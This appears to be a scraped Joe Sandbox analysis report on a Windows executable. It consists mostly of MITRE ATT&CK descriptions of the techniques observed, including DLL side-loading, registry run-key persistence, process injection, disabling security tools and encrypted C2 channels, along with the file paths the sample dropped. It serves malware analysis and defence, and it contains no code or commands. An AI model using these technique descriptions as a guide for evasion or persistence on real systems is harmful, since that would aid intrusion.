Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 287438657364-7643738421.08.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\b3aEb0H\1y6U0V.exe

C:\Program Files (x86)\b3aEb0H\log.src

C:\Program Files (x86)\b3aEb0H\tbcore3U.dll

C:\Program Files (x86)\b3aEb0H\utils.vcxproj

C:\Program Files (x86)\vhZp0W\log.src

C:\Program Files (x86)\vhZp0W\tbcore3U.dll

C:\Program Files (x86)\vhZp0W\utils.vcxproj

C:\Program Files (x86)\vhZp0W\vhZp0W.exe

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Windows Analysis Report
287438657364-7643738421.08.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre